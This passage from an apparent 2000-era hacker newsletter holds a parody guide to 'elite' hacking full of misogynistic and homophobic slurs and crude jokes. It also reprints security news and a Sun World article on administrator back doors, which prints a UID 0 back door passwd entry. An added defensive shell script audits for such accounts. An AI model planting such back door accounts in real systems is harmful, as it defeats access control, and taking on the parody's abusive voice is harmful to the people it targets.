Maybe they'll fix it in the next version, or maybe they're too lame to have ims!!!!!!!!!!!!!!!!!!!! ROFLMFOAJFHJLOLOLOLQWXMIDHENDIHAMEHIDNDFIWQNXDKCHAIRDQWDHADSHCSALFWQLHQHDF JWFILFWJIFSDHHLOLDFSHIWEF!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! OK, but seriously, if your first punter doesn't w3rk, try 7 or 8 of your other punters. If it still doesn't work, just make fun of their mom and say they're gay! Section 6: Phreaking This section is on phreaking. Now, phreaking is fone hax0ring, and the first thing you must learn to be a l33t0 phreaker is to substitute all f's with ph's and all ph's with f's; until you have mastered this skill you are just another lamer (like joey unless you do a righteous hack remember), also to be a super duper phreaker you need some of the legendary colored boxes. To build these boxes you need the following parts Red Box- a box, red spray paint Blue Box- a box, blue spray paint Beige Box- a box, Beige spray paint Now since these boxes ar so insanely difficult to construct we will take a break so we can use our drugs and be a cool raver type. Becuase remember, all supreme hax0rs are raver druggie types. its common knowledge. duh. Section 7: Hacking with Fate™ by Fluxxie Now this is the leetest stage there is. because Fate™ it the leetsest prog there is, a true foundation to the hacker community. There are many versions of Fate™, but its always good to have all the versions. (Little do people know, when you compile all the different source codes of Fate™ you have the security information to hack a Gibson, very very 31337.) To get Fate™ go into a hacker private room, something like MM or even Fate™ (yes thats right, Fate™ even has its own room!) and start scrolling your request. People will be obliged to help such a worthy cause. Now that you have obtained Fate™ you have to get a dial up, something like the FBI. You can find these number listed in your local phone book. 
After you call them you may get what sounds like someone talking through your modem speaker. This is one of their secret tatics to make you think that you got a wrong fone number. Once this has happened you have made contact, remember this is an important part, so keep calling back. Now the connection has been made start pushing all the buttons on the Fate™ screen. This may look like its not doing anything, but thats only the hidden screen so that nobody can see what you really doing. Which means its great to use this in school, or other open places. Now that the steps have been completed get back on Amercia Online and tell everyone of your accomplishment. This will let them know how leet you are, and show them you are one to ph33r. (This will help you get all the chix0rs, see later sections.) Section 8: HaX0ring your local Gibson by Mike Any real haX0r will tell you that a Gibson is a huge supercomputer with amazing security. How do they know? How else? They watched "Hackers" and learned it all. Now, the trick is to find one of these. All you have to do is call your friendly FBI office and ask them for a Gibson dialup. Make sure your intentions are clear, or they'll lie to you. Next, go to Phreak and bug everyone asking if anyone can card you a laptop. When DCY is done ripping you off, take your laptop and magically hook it up to a payphone. I won't get into how to do this, because its too 31337 for a beginner. Now, all you have to do is use a phone dialing program and call the dialup. Once you've connected, Run in a cirle, stomp on the ground, strip naked and jump on top of the phone booth screaming to old women near you, "I AM DADE MURPHY!!! PH33R ME!!!" then get down, and turn your brand new laptop on and off about 400 times really fast. This should give you a mail port. If it doesn't, the Gibson doesn't properly ph33r you and you should get another number, but this time try calling the CIA. They're usually alot more friendly. 
Once you've successfully gained access, be sure to post all of your achecivements on your local Warez/HaX0r/p0lice BBS. (VERY IMPORTANT.....Make sure your not wearing Nikes while trying this. I'm not sure why, but it has something to do with compatibilty.) Section 9: Extended phreaking By Mr. Azure "Real men use paperclips." "This room's called leet for a reason." - Exodus##### from PR: leet NOTE: If your worried about being caught, Please refer to the end of this article. Alright, get all your little asses around here. Way back before you were making model airplanes, jerking off, and hax0ring, there where the Warriors of the Almighty Paperclip. Armed with only with a paperclip and the occasionaly back hoe, these brave adolscents would use the combined power of these menial tools and their intelligence to operate payfones in amazing ways. One of the most legendary and perhaps the best of the Warriors of the Almighty Paperclip was the vernerable and supreme uberpaperclipman, Timmy. When Timmy was 10, he was playing on his fathers construction site. Timmy, being the child prodigy that he was, figured out something amazing: if he took a paperclip, any old paperclip, and put it on the RT terminals (if the preceeding terms don't make sense, try doing what Timmy does in the coming sentances of wonder) he would not only be shocked and possibly burned, but that fone would NOT WORK WHILE THE PAPERCLIP WAS IN PLACE!! Timmy, because he was dropped on his head from a height of 10 feet at the age of 2, had a problem of not remembering. Foretunately for the phreak community at large, a 2x4 came shooting out of no wear and hit Timmy in his now mishapened head. That wonderous peice of flying wood cemented the paperclip into Timmy's memory*. So Timmy, who made a transformation comparable to that of Job's in The Lawnmower Man with a peice of wood, took his wheelchair to payfones, and using one of those illustrious paperclips, managed to... WAIT! I hear you bitching! 
You stupid old schooler! What the HELL does this have to do with me?! Is THAT what your saying? Well, not much, but it was a nice story. Actually, if your scrawny asses have ever seen Wargames, you would know that kid with the bad haircut managed to get a free call with a paperclip. Alas, today, it is not as easy as it once was. See, back in Wargame's time, which, incedentally, for those who'd like to know when it was made, 15 years or so before the movie Hackers**, paynfones used to be easy to phreak. But NO MORE! In the last phreaking article, you may of heard about the red box, the blue box, and the beige box. If not, well then drink some more cuervo, sit back, and enjoy the ride. For simplicity's sake, we'll start with a very useful box, the cardboard box. This is a relatively easy to make box, but you would be forgiven if the box wasn't completed in under a day. To make a cardboard box, you'll need: a big cardboard box, a red box, a car, and some hard liquor. The only two ingredients essential are the cardboard box and the hard liquor. Prefferably scotch. Speaking of hard liquor, in my next article, I'll be talking about old fashioned RPGs. Back to the subject at hand. If you have your cardboard box and your scotch, it's time you find a payfone. Once the payfone is reached, drink a quarter of the bottle of scotch. And not in those little girly swigs, I'm talking BAM! Then, after you get back up, take the receiver of the payfone and shove it through the top of the big cardboard box. Dial a random 800 number, for example. Then proceed to get underneath the box, and practice fone copulation with the operator you reach. At every minute, or when it feels best, continue to take large doses of the scotch. Remember: after this excursion, YOU MUST GO IN AOL AND SCROLL THIS ACCOMPLISHMENT! Otherwise, you really didn't phreak. And besides, the chix0rs and hax0rs'll never know of you then. And with cuspy bodies like they have, you can't miss out. 
I hope this file has been helpful, if not, well, thank the cuervo for that. GLOSSARY: 1. Paperclip - Metal peice, found in offices, used to hold papers together. Or that's what they want you to think. In actuallity, the paperclip is an invention by a grandmaster phr33k in the sky as a gift to all. (I met him once. He's a big boy, ya know. If you wanna meet him, try drinking some everclear and hitting your head against the wall after you wake up.) FOR MORE INFORMATION ON THE PAPERCLIP, PLEASE REFER TO TERM 5 IN THIS GLOSSARY. 2. AOL - America Online. Of all networks, this is the best. All of the truly leet hax0rs and phr33ks inhabit AOL. Please refer earlier in this file for more about AOL. 3. MST3k- Funny show. Watch it or die. 4. South Park- Funny show. Watch it or die. PLEASE REFER TO BEGINNING OF ARTICLE ------------- *This didn't actually happen. The paperclip was still in Timmy's hand, but the thought of it was in his brain permenantly. **True k-radness is shown also in worshopping the movie Hackers. Thus, if you want to tell a fellow hax0r or phr33k a date, like if your birthyear 1984, you'd say "Oh, I was born 10 years before before Hackers came out." Section 10: Chix0rs, and How to get them. By Orin Chix0rs are one of the great rewards of being a truly 1337 hacker. The true hacker has all the chix0rs he desires as his fingertips. A chix0r is a female hacker. Of course, girls *can't* be hackers, but, its nice to have a few who pretend; it adds diversity to the hax0r community. A good way find out if there are any chix0rs around is to go into private rooms and ask around (i.e. "R THERE N E FEMALES IN DA ROOM?!?!!?!?!!@#!?"). I've heard there are lots of girls in a private room called Phreak, but, thats just a lame \\'aReZ room. So, after you have determined that there are indeed chix0rs inhabiting your room, its probably a good idea to win them over with your obviously 1337 charm. You do this by showing them who's boss. 
For example: Xir0KewL: R THERE NE CHIX IN DA ROOM?!?!!@#!?!?!??! Chix0r43: Argh, there they go again :-/ Xir0KewL: CHIX0R, R U FEMALE?!?! Chix0r43: I am genderless. Xir0KewL: PHUCK OFF BITCH . Chix0r43: eh? Xir0KewL: DUMB PUSSY LICKING BITCH. U QUEEF TAMPONS OUT YR ASS!!@!!!! Chix0r43: hehe, i bet he feels inadequate Xir0KewL: SHUT UP, BITCH, YOU DONT MAKE NO SINCE As you can seel, Chix0r43 obvously wants Xir0KewL, and its just a matter of him punting her a few times to get her to see this. A large part of obtaining chix0rs is being ph33red (see Section 3). If you are ph33red by the chix0rs, it puts you one step closer to total hax0r domination (see Appendix). Section 11: BBS hax0ring for dummies. By Cochise The first step to hacking a BBS (Bulletin Board System) is to find the phone number for one. The best way to do this is to go to the best hacking resource there is, AOL. Go into all of the chat rooms, ecspecially the warez rooms, and scroll many times asking for a BBS number in your area code. IMPORTANT: you must scroll many times or you will not get a number. After you scroll it about 100 times people will think you are so elite that they will give you a BBS number. Another way to get a number is to subscribe to all of the hax0r mailing lists and newsgroups you can find and post many messages a day asking for a BBS number in your area code. You can also tell them your phone number, that helps out alot. And once you have the number the hard part is over. The next thing you have to do is dial the number with your communication software. HyperTerrible™ is the best, but it only comes with Microsoft Unix 97, so use whatever you have. Once you connect login with a name like John Q. Phreak just so everyone knows that they should ph33r you (See Section 3). Once you get on download everything you can find, even if you dont know what it is. But dont be a leech, make sure your upload/download ratio is at least 300:1. 
Send messages to the sysop and tell him how "/<- r4D" he is and ask if you can upload your 31337 warez to the board (and do it anyways even if he says no). Become friends with him and find out a time when no one will be at his house. Then look up his address in the phone book (because being the l33t hax0r you are you already know his real name). Now this is where the real hacking begins. Before you go hax0ring around you must have the proper tools: 1) Hard liquor (See Section 9) 2) An axe (more on this later) 3) Your laptop (of course you have a laptop youre 31337) The next step is to go to his house (you may use tool number one at any time). Then you must find an exploit that will let you into his house (break in). If you can not find one, brute force hacking (with the axe ) is always good. Then make your way to the where the computer is. This is your moment of zen, you are now about to hax0r a BBS. The next thing you do is get the axe and hold it as far back as you can, then bring it down as hard as you can hacking the CPU, monitor, keyboard, mouse and any other computer parts you see. The last step in becoming a BBS Uberhax0r is to plug your laptop into the modem and immediatly sign on to AOL and start bragging about your accomplishment and letting everyone marvel in your glory so they know how lame they really are. Section 12: Advanced Hacking Techniques by gat0r (ali) DiScLaImEr: ThIs FiLe Is WrItTeN fOr InFoRmAtIoN pUrPoSeS oNlY-iF yOu GeT cAuGhT dOiNg AnYtHiNg IlLeGaL iT iZ n0t My FaUlT!@#$%@#$%. INTR0: Yo, gat0r here, keepin it real. i wrote dis gizzit cuz i'm all about the phreedom of information. (well, i'm really not. if i cared about the phreedom of information i'd get a job at the public library. i really wrote this file to satisfy my ego and advance my social status in hacking circles. maybe someday a kewl looking hacker chick like acid burn will have sex with me.) 
topics discussed in hea will not be about encryption, sploits, protocols or any of that lame shit. what this is all about is what REAL hackers do: get inf0z. PART_1: GeTtInG aCcEsS tO YoUr LiBrArY Ok, hackers want information. they love information. info turns them on. Now, s'pose you suck. this shouldn't be hard. now let's s'pose you want to learn unix...you heard eggheads talk about it in chatrooms and it sounds elite. But wait! Silicon Toad doesn't have any good filez on it. you wanna know why? he sucks ass. but that's besides the point. A source of good info on unix would be your public library! i know, i know...they took away your library card for never returning _coping_with_being_a_loser_. But i figured out a way to help you get your info. just walk in, ask the librarian for books on unix (using the card cataloge is far too advanced for you right now) and then sit down and read it. Problems? Here's a list of what may have went wrong (btw- don't do these in the future): -you went when they are closed. -you went naked, cops arrested you, then anally raped your arse. -all the metal shit on yer pierced face set off the stolen book detectors. It's that easy. Now get some Kn0wLeDgE. PART_2: GeTtInG iNf0z On PeOpLe For some reason, knowing someone's name, address, telephone number, etc etc is real elite. Just ask s010 from CRH. In all his zines he gets inf0z on those sinnerz dorks. god damnit, this is so dumb i won't even write it. just use a f00kin telephone book. wow, i 0wN j00. i got your telephone numbers. look at me guys, i'm cool. damnit...alcohol is kiickin in. PART_3: Reading Ok, i'm sober again. Reading is an important technique/skill hackers master. Being able to read helps you understand the words in book that give you elite k-rad knowledge. Call 1800-abcdefg for more info on how to read. once you learn how to read, you're all set. ENDTRO: Fuck you all. seriously. each and every one of you. i 0wn you all. i am elite and you can all lick my balls. 
king kong size balls for that matter.

@HWA

58.0 FAA Systems Vulnerable Due to Y2K Fixes 01/05/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The General Accounting Office has said that the Federal Aviation Administration's procedures for fixing the Y2K problem have left it wide open to attack. The GAO alleges that the use of foreign nationals to review potential Y2K problem code allowed back doors and other nasty tidbits to be left behind. As of yet no actual evidence has been found to support these claims.

Wired
http://www.wired.com/news/politics/0,1283,33432,00.html

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/2000/0103/web-faay2k-01-04-00.html

GAO Report - PDF File
http://www.gao.gov/new.items/ai00055.pdf

Wired;

Report: Airport Safety at Risk
by Declan McCullagh

3:00 a.m. 5.Jan.2000 PST

WASHINGTON -- It's a made-for-the-Net tale with all the right ingredients: Y2K, hackers, terrorists, and planes flying straight into the ground.

The US Federal Aviation Administration's slipshod security when reprogramming air traffic computers for the year 2000 has made the system more vulnerable to sabotage, government auditors said Tuesday.

Dozens of Chinese citizens and other foreign nationals were accidentally hired as programmers charged with repairing important air traffic systems, according to the General Accounting Office.

Investigators at the GAO, the auditing arm of Congress, have found no evidence of illicit tampering or espionage, however. "We did not find any such instances during our review," the 35-page report said.

But the House Science committee still saw red.

"We urge you to determine the extent to which other departments and agencies may have allowed unscreened persons access to the federal critical infrastructure during the process of Y2K remediation," chairman Representative James Sensenbrenner (R-Wisconsin) wrote in a letter to the White House National Security Council.

The fuss over foreigners with access to US government computers comes a few weeks after former Los Alamos National Laboratory physicist Wen Ho Lee was indicted on 59 counts of mishandling nuclear secrets, including some on magnetic tape. His attorney said Lee would fight the charges, and some critics of the Justice Department have said the prosecution was racially motivated.

The FAA's hiring policy is clear. According to a human resource manual, contractors may hire only US citizens or legal aliens for work performed on government property.

But that's not what happened. "FAA contractors used foreign nationals to help remediate mission-critical systems," the GAO said. Chinese, Ethiopian, Irish, and Ukrainian citizens worked on one traffic-flow management program.

The possibilities of sabotage that could imperil air travel worry the auditors, who investigated FAA facilities in Washington and Atlantic City, New Jersey.

An earlier GAO report in May 1998 claimed the FAA had lax physical and electronic security. In response, the FAA in February 1999 hired its first "chief information officer" to respond in part to the problem.

It didn't work. "There is inherently more risk that unauthorized changes, which are difficult to detect, could have been made during code renovation. In addition, program errors detected during testing may not have been identified for correction by individuals intending harm, resulting in potential system errors," the GAO said in its report released Tuesday.

GAO staff briefed the House Science committee on their findings in December.
The FAA said it believes the risk of sabotage is low, but on 10 December distributed a memo reminding employees and contractors of its hiring policies.

-=-

@HWA

59.0 Internal Employees Greatest Threat Says New Study 01/05/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

A survey conducted by Michael G. Kessler & Associates Ltd., a New York-based security firm, found that 35 percent of the theft of proprietary and confidential information is stolen by disgruntled employees. Other U.S. companies steal 18 percent, foreign corporations stole 11 percent and foreign governments took 8 percent. Only 28 percent of information theft was attributed to a lone external attacker.

APB News
http://www.apbnews.com/newscenter/internetcrime/2000/01/04/comptheft0104_01.html

Employees, Not Hackers, Greatest Computer Threat
New Study Shows Unhappy Workers Steal Trade Secrets

Jan. 4, 2000

By David Noack

NEW YORK (APBnews.com) -- The greatest security threat to companies' computer systems comes from disgruntled employees stealing confidential information and trade secrets, according to a new study on cyber-security.

The survey, conducted by Michael G. Kessler & Associates Ltd., a New York-based security firm, found that 35 percent of the theft of proprietary information is perpetrated by discontented employees.

Outside hackers steal secrets 28 percent of the time; other U.S. companies 18 percent; foreign corporations 11 percent and foreign governments, 8 percent.

The remaining 10 percent, according to the study, are listed as miscellaneous crimes.

The financial losses caused by these cyber break-ins totaled $42 million last year, which is up more than 100 percent from the 1997 figure of $20 million.

'No such thing as a hacker's holiday'

"Computer crime is much more complex than bugs and viruses," said President and CEO Michael G. Kessler.

"Y2K enlightened business owners to pitfalls in their systems, but there must also be heightened awareness of the growing number and variety of computer security breaches that can weaken a company's balance sheet."

The survey was done over the last six months, and written questions were given to 300 of Kessler's clients and other companies.

He said that disgruntled employees could be capable of taking business records, trade secrets and payroll information.

"It doesn't take a new millennium for corporate computer piracy to occur," said Kessler. "There's no such thing as a hacker's holiday. Internet invasions increase with growing computer and Internet popularity. Codes can be cracked; systems will be sabotaged. Hacking is a reality, and CEOs who have turned a deaf ear to its existence will be shocked when it happens to their allegedly fail-safe network."

Kessler cautioned that now that Y2K is over, corporations shouldn't be lulled into a false sense of security.

Hacker attacks not often reported

"Problems could just as easily occur on Jan. 30 as Jan. 1. Businesses should brace for outbreaks of sophisticated viruses and hackings from outside and in. Once a breach in computer security has occurred, our research historically reveals much more -- a 'subplot' that can alert corporations to the real root of some serious trouble," said Kessler.

He said companies fail to report computer break-ins for fear of bad publicity, and that for every break-in reported, 400 do not.

The Kessler study mirrors previous reports showing that computer security is one of the biggest challenges facing corporate America.

Computer-crime rates and information-security breaches continue to increase, according to a joint study conducted last year by the Computer Science Institute and the FBI.

Losses greater than $100 million

The 1999 Computer Crime and Security Survey, based in San Francisco, polled 521 security professionals at U.S. corporations, government agencies and universities.
The findings revealed that financial losses among 163 respondents totaled $124 million, which was the third straight year the survey had recorded losses greater than $100 million.

"It is clear that computer crime and other information security breaches pose a growing threat to U.S. economic competitiveness and the rule of law in cyberspace," said Richard Power, editorial director of the institute. "It is also clear that the financial cost is tangible and alarming."

System break-ins by outsiders were reported by 30 percent of respondents, and unauthorized access by insiders was reported by 55 percent.

Technology not enough

Even though security measures, such as digital identification, encryption and intrusion-detection systems are being used more frequently, technology itself is not enough to stymie hackers.

The study also found that 98 percent of respondents said they use anti-virus software, 90 percent reported incidents of virus contamination. Also, system penetration from outside grew for the third straight year despite 91 percent of respondents saying they used firewalls.

"The lesson to be learned is simple security technology does not equal a security program," said Power, suggesting that well-trained, motivated staff and smart procedures are just as important for security as technology.

Justice Department stepping in

The problem of proprietary information being breached on computer systems has prompted the Justice Department to devote an entire section to computer crimes, called the Computer Crime and Intellectual Property section.

In addition, the Economic Espionage Act of 1996 is expected to be used to prosecute foreign sources of computer crime.

Michael A. Vatis, director of the FBI's National Infrastructure Protection Center, agrees that a "disgruntled insider" is the principal source of computer crimes.

"Insiders do not need a great deal of knowledge about computer intrusions, because their knowledge of victim systems often allows them to gain unrestricted access to cause damage to the system or to steal system data. The 1999 Computer Security Institute/FBI report notes that 55 percent of respondents reported malicious activity by insiders," Vatis told a Congressional committee last year.

Coast Guard lost data

Recent cases of white-collar computer crimes include:

Shakuntla Devi Singla used her insider knowledge and another employee's password and log-on identification to delete data from a U.S. Coast Guard personnel database system. It took 115 agency employees over 1,800 hours to recover and re-enter the lost data. Singla was convicted and sentenced to five months in prison and five months home detention and ordered to pay $35,000 in restitution.

Software engineer William Gaed, working for a subcontractor to Intel Corp., was convicted of illegally downloading secret data on the computer giant's plans for a Pentium processor worth between $10 million and $20 million. Authorities said Gaed also videotaped information on his computer screen and planned to sell the tapes to a competitor. Gaed was sentenced to 33 months in prison.

And, according to a General Accounting Office (GAO) report issued in October, the federal government has been lax in protecting computer networks used by government and businesses.

"At the federal level, these risks are not being adequately addressed," the report said.

U.S. unprepared for information threat

The report showcased concerns of some experts about threats to private-sector systems that control energy, telecommunications, financial services, transportation and other critical services.

"Few reports are publicly available about the effectiveness of controls over privately controlled systems," GAO said.

Currently, there is no strategy to improve government information security, the GAO report found.
If the United States is faced with a threat, the response could be "unfocused, inefficient and ineffective," wrote Jeffrey Steinhoff, the acting assistant comptroller general.

David Noack is an APBnews.com staff writer (david.noack@apbnews.com).

@HWA

60.0 Are the Greatest Risks Internal or External? 01/05/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Who is the biggest risk to your network security? Is it the cyber intruder trying to knock over your firewall from the outside? Or is it the trusted employee who already has the administrative access? Carole Fennelly at Sun World takes a look at these internal security threats.

Sun World
http://www.sunworld.com/sunworldonline/swol-01-2000/swol-01-security.html

Who gets your trust?
Security breaches can come from those you least suspect

Summary

Systems administrators have extraordinary access to all the data on corporate systems. What can be done to ensure that your administrators will not betray that trust? (3,000 words)

In the business world you will often hear the statement "We don't hire hackers." When pressed for a reason, the speaker usually reveals a fear that a "hacker" will install a back door in the system. Time and time again, however, I have seen back doors installed by employees or security professionals whose integrity is never questioned. When confronted, they usually say it's no big deal. After all, they have the root password. They just wanted to set up a root account with a different environment. That's not hacking, right? Wrong. Their intention did not matter -- the security of the system has been bypassed.

This article discusses how administrative privileges can be abused and suggests some methods for countering that abuse. It is not meant to imply that every administrator abuses privileges or has malicious intent -- just that you shouldn't assume anything.

What is a back door?
Quite simply, a back door is a method for gaining access to a system that bypasses the usual security mechanisms. (Has everyone seen WarGames?) Programmers and administrators love to stick back doors in so they can access the system quickly to fix problems. Usually, they rely on obscurity to provide security. Think of approaching a building with an elaborate security system that does bio scans, background checks, the works. Someone who doesn't have time to go through all that might just rig up a back exit so they can step out for a smoke -- and then hope no one finds out about it.

In computer systems, a back door can be installed on a terminal server to provide direct access to the console remotely, saving the administrator a trip to the office. It can also be a program set up to invoke system privileges from a nonprivileged account.

A simple back door is an account set up in the /etc/passwd file that looks like any other userid. The difference is that this userid doesn't have to su to root (and it won't show up in /var/adm/sulog) -- it already is root:

     auser:x:0:101:Average User:/home/auser:/bin/ksh

If you don't see it, look again at the third field (userid) and compare it to the root account. They are the same (0). If you are restricting direct root logins to the console only (via /etc/default/login), then this account will have the same limitation. The difference is that if someone does su to this account, it will not be apparent in /var/adm/sulog that it is root. Also, a change to the root password will not affect the account. Even if the person who installed the account intends no harm, he or she has left a security hole.

It is also pretty common for an administrator to abuse the /.rhosts file by putting in desktop systems "temporarily." These have a way of becoming permanent.

Back doors can also be set up in subtler ways through SUID 0 programs (which set the userid to root). Usually, the motivation for setting up back doors is one of expediency.
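Added example (not part of the Sun World article): a shell audit for two of the back doors described above, extra UID 0 accounts in a passwd-format file and hosts in root's .rhosts that nobody approved. The function names, the approved-hosts list and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Audit helpers for two back doors named in the article:
#   1. accounts other than "root" whose UID field is 0
#   2. entries in root's .rhosts that are not on an approved list
# Files are passed as arguments so the checks can run against copies,
# e.g.  uid0_accounts /etc/passwd

# Print "name uid gid shell" for every non-root account with UID 0.
# The UID is compared numerically, so a value written as 00 is also caught.
# Comment lines and lines without the seven passwd fields are skipped.
uid0_accounts() {
    awk -F: '
        /^[ \t]*#/ || NF < 7 { next }
        $3 ~ /^[0-9]+$/ && ($3 + 0) == 0 && $1 != "root" {
            print $1, $3, $4, $7
        }
    ' "$1"
}

# Print each entry of the .rhosts file ($1) whose host is not listed in the
# approved file ($2, one host per line, may be empty but must exist).
# A bare "+" (trust every host) is always reported.
rhosts_unapproved() {
    [ -f "$1" ] || return 0
    awk '
        FILENAME == ARGV[1] { if ($1 != "" && $1 !~ /^#/) ok[$1] = 1; next }
        /^[ \t]*#/ || NF == 0 { next }
        $1 == "+" || !($1 in ok) { print }
    ' "$2" "$1"
}

# Run both checks, print a short report, return 1 if anything was found.
audit_backdoors() {
    findings=0
    out=$(uid0_accounts "$1")
    if [ -n "$out" ]; then
        echo "UID 0 accounts other than root:"
        echo "$out" | sed 's/^/  /'
        findings=1
    fi
    out=$(rhosts_unapproved "$2" "$3")
    if [ -n "$out" ]; then
        echo "Unapproved .rhosts entries:"
        echo "$out" | sed 's/^/  /'
        findings=1
    fi
    return $findings
}

# --- constructed sample data (not from any real system) ---
sample=$(mktemp -d)
trap 'rm -rf "$sample"' EXIT

cat > "$sample/passwd" <<'EOF'
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
# constructed comment line
auser:x:0:101:Average User:/home/auser:/bin/ksh
buser:x:1001:101:Another User:/home/buser:/bin/ksh
toor:x:00:1:Alt root:/:/bin/sh
EOF

cat > "$sample/rhosts" <<'EOF'
# constructed root .rhosts
adminhost root
desktop42 jsmith
+
EOF

echo "adminhost" > "$sample/approved"

audit_backdoors "$sample/passwd" "$sample/rhosts" "$sample/approved" \
    || echo "findings present: review before trusting this host"
```

Neither check covers SUID 0 programs, the third back door the article mentions.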
The administrator is just trying to get a job done as quickly as possible. Problems arise later when either (1) he leaves under normal circumstances and the hole remains or (2) he leaves under bad circumstances and wants revenge.

Proprietary data

A manager may also be reluctant to hire "hackers" for fear that they may divulge proprietary information or take copies of proprietary data. Several years ago, I was consulting at a company when a new administrator joined the group. In an effort to ingratiate himself with the team, he confided that he had kept the backup tapes from his old job (a competitor) and that they had some "really cool tools." It so happened that a consultant with my own business worked at the competitor's site. A scan of the tape revealed the proprietary software that the administrator had been working on, which eventually sold for a significant amount of money. While the admin probably did not intend to steal the software, his actions could have left his new employer facing a large lawsuit -- all for the sake of a few shell scripts. In this particular case, no one believed that the administrator had any ulterior motives. I wonder if people would have felt that way if he had been a "known hacker"?

System monitoring

Administrators are supposed to monitor system logs. How else can problems be investigated? But there is a difference between monitoring logs for a legitimate reason and monitoring them to satisfy prurient curiosity. Using the system log files to monitor a particular user's behavior for no good reason is an abuse of privileges.

What is a good reason? Your manager asks you to monitor specific logs. Or maybe you notice suspicious activities, in which case you should inform the management. Or, more commonly, a user complains about a problem and you are trying to solve it.

What is a bad reason? A user ticks you off and you want to see how he is spending company time. Or a user has a prominent position in the company and you want to know what kinds of Websites she goes to.

Countermeasures

You can take some actions to ensure the integrity of privileged users, but none of them carries any guarantee.

Background checks

You can have an investigative agency run a background check on an individual and you can require drug tests. These tell you only about past behavior (if the individual has been caught).

The state of New Jersey (where I live) has adopted a law commonly referred to as Megan's Law (see Resources). The law mandates that a community be notified of any convicted sex offender living in the community. On the surface, it sounds like a great idea and a way to protect children from predators. As a parent, I am particularly sensitive to crimes against children. I received a Megan's Law notification this past year about a convicted sex offender who moved into town. It did not change a thing for me. My feeling is that every child molester has to have had a first time and that in any case not all molesters have been identified. Therefore, I take appropriate precautions with my children, regardless of who has moved to the area.

In the technical field, hackers are considered the molesters. (Yes, I know all about the politically correct terms cracker, defacer, etc., but the common term these days is hacker.) How do you know if someone is a "hacker"? Some people try to refine the term to mean "someone who has been convicted of a computer crime." But let's say, for example, that you attend Defcon, the hackers' conference, and encounter an intelligent job seeker with bright blue hair and funky clothes. Would you hire him? Chances are that you would at least scrutinize his credentials and make sure your contract spelled out all details of the work to be performed and the legal repercussions for any violations. What if the same person showed up for an interview with the blue dye rinsed out and in a nice pressed suit?
Be honest: would you perform the same background checks regardless of a person's appearance?

Technical measures

Some technical software packages can limit or control superuser privileges. I recommend using them to prevent the inadvertent abuse of superuser privilege. Unfortunately, knowledgeable administrators and programmers with privileged access will be able to circumvent these measures if they really want to.

sudo

The freely available sudo package provides more granular control over the system by restricting which privileged commands can be run on a user basis. See Resources for the Sudo main page, which has a more complete description.

Tripwire

Tripwire is a file integrity package that, following the policy determined by the administrator, reports any changes made to critical files. Tripwire was originally developed at Purdue University by Gene Kim under the direction of Eugene Spafford. I plan to evaluate the merits of the commercial version of Tripwire in a future column.

Tripwire is a good way for an administrator to tell whether the system files or permissions have been modified. What can be done, however, if the senior administrator who monitors the system has malicious intent?

Professionalism

The best defense against the abuse of administrator privileges is to rely on a certain level of professionalism. The medical Hippocratic oath includes the mandate Do No Harm. While there is no such professional oath for systems administrators, you can establish guidelines for acceptable behavior.

During the mid-1980s, I worked as an administrator in a computer center at a large telecommunications research facility. We had a code of ethics that a user had to sign before an account could be installed. We also had a code of ethics for privileged users that included additional restrictions, such as:

- No SUID 0 (set userid to root) programs will be installed without the consent, in writing, of the senior administrator.

- All users' email is to be considered private and confidential and may not be read by anyone other than the intended recipient.

- Users' files may not be modified or read except in the case of a predetermined problem or security investigation. Be prepared to justify.

- Privileged users are often entrusted with sensitive information, such as an employee termination, before other employees. This information is to be kept confidential.

- The root passwords are changed monthly and are to be distributed by the senior administrator only. The passwords must be kept in a safe location, such as your wallet. If the password is lost, notify the senior administrator or your manager immediately.

- Keystroke monitoring of user activities is strictly prohibited without senior management approval, in writing.

- All administrative procedures and tools are to be considered proprietary information and are the property of the computer center.

- Tape archives may not be removed from the facility without written approval.

Discretion

A code of ethics for privileged users should not be considered a punitive device, but rather a statement about the integrity of the person who signs it. At one point during my years in the computer center, the secretary to the president of the company came to me with a printer problem. As I was assisting her, she became upset when she realized that the test job she had sent to the printer was highly confidential. I was able to reassure her that all administrators were bound by a code of ethics and would be terminated for violations. (Besides, I wasn't really reading it, I was just looking for garbage characters!)

Professionals must establish a certain level of trust. This is especially important for those privy to sensitive information regarding terminations or investigations.

Final thoughts

Would I hire someone who showed up for an interview with blue hair, body piercings, and a name like 3v1l HaK0rZ? No.
Not because he might install a back door, but because he was ignorant about what was acceptable on Wall Street. As for the back doors? More are installed by well-groomed "professionals" in suits than by "hackers." Anyone with the required skills can be either a "security consultant" or a "hacker." The only difference is the label.

Disclaimer: The information and software in this article are provided as-is and should be used with caution. Each environment is unique, and readers are cautioned to investigate, with their companies, the feasibility of using the information and software in this article. No warranties, implied or actual, are granted for any use of the information and software in this article, and neither the author nor the publisher is responsible for any damages, either consequential or incidental, with respect to the use of the information and software contained herein.

About the author

Carole Fennelly is a partner in Wizard's Keys Corporation, a company specializing in computer security consulting. She has been a Unix system administrator for almost 20 years on various platforms and of late has focused on sendmail configurations. Carole provides security consultation to several financial institutions in the New York City area.

@HWA

61.0 Japanese Firms Turn To Security After Y2K 01/05/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

With the conclusion of many Y2k efforts many Japanese companies will be turning those resources onto increasing the security of their computer systems. A survey conducted by Nikkei Internet Technology of major Japanese firms indicated that resources will now be applied to creating more secure systems.

Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/90770

Japanese Firms to Boost Net System Security after Y2K Issue Subsides

December 29, 1999 (TOKYO) -- Japanese corporate efforts geared toward Y2K software readiness will soon conclude, and many companies will then focus on constructing better Internet systems.

